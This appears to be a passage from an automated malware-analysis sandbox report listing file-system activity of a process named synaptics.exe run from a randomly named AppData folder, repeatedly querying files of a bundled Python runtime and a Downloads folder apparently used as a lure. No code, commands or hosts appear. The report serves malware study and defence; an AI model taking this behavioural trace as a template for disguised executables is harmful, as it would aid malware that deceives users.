Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.21664000 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\distutils-precedence.pth VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.7323256 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32.pth VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.7294368 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\base64.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\base64.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\base64.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\base64.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\base64.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\base64.cpython-310.pyc.21599800 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\re.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\re.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\re.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\re.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\re.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\re.cpython-310.pyc.21602192 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\enum.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\enum.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\enum.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\enum.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\enum.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\enum.cpython-310.pyc.23878944 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\types.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\types.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\types.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\types.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\types.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\types.cpython-310.pyc.23879152 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_compile.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_compile.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_compile.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_compile.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_compile.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\sre_compile.cpython-310.pyc.21664112 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_parse.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_parse.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_parse.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_parse.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_parse.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\sre_parse.cpython-310.pyc.21667248 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_constants.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_constants.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_constants.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_constants.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\sre_constants.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\sre_constants.cpython-310.pyc.23933408 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\functools.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\functools.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\functools.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\functools.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\functools.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\functools.cpython-310.pyc.23935088 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\collections VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\collections\__pycache__\__init__.cpython-310.pyc.23945848 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\keyword.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\keyword.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\keyword.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\keyword.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\keyword.cpython-310.pyc.25164672 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\operator.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\operator.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\operator.cpython-310.pyc.25164776 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\reprlib.cpython-310.pyc.25342088 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\copyreg.cpython-310.pyc.25297448 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\struct.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\struct.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\struct.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\struct.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\struct.cpython-310.pyc.23876032 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__pycache__\__init__.cpython-310.pyc.25167312 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib VolumeInformation
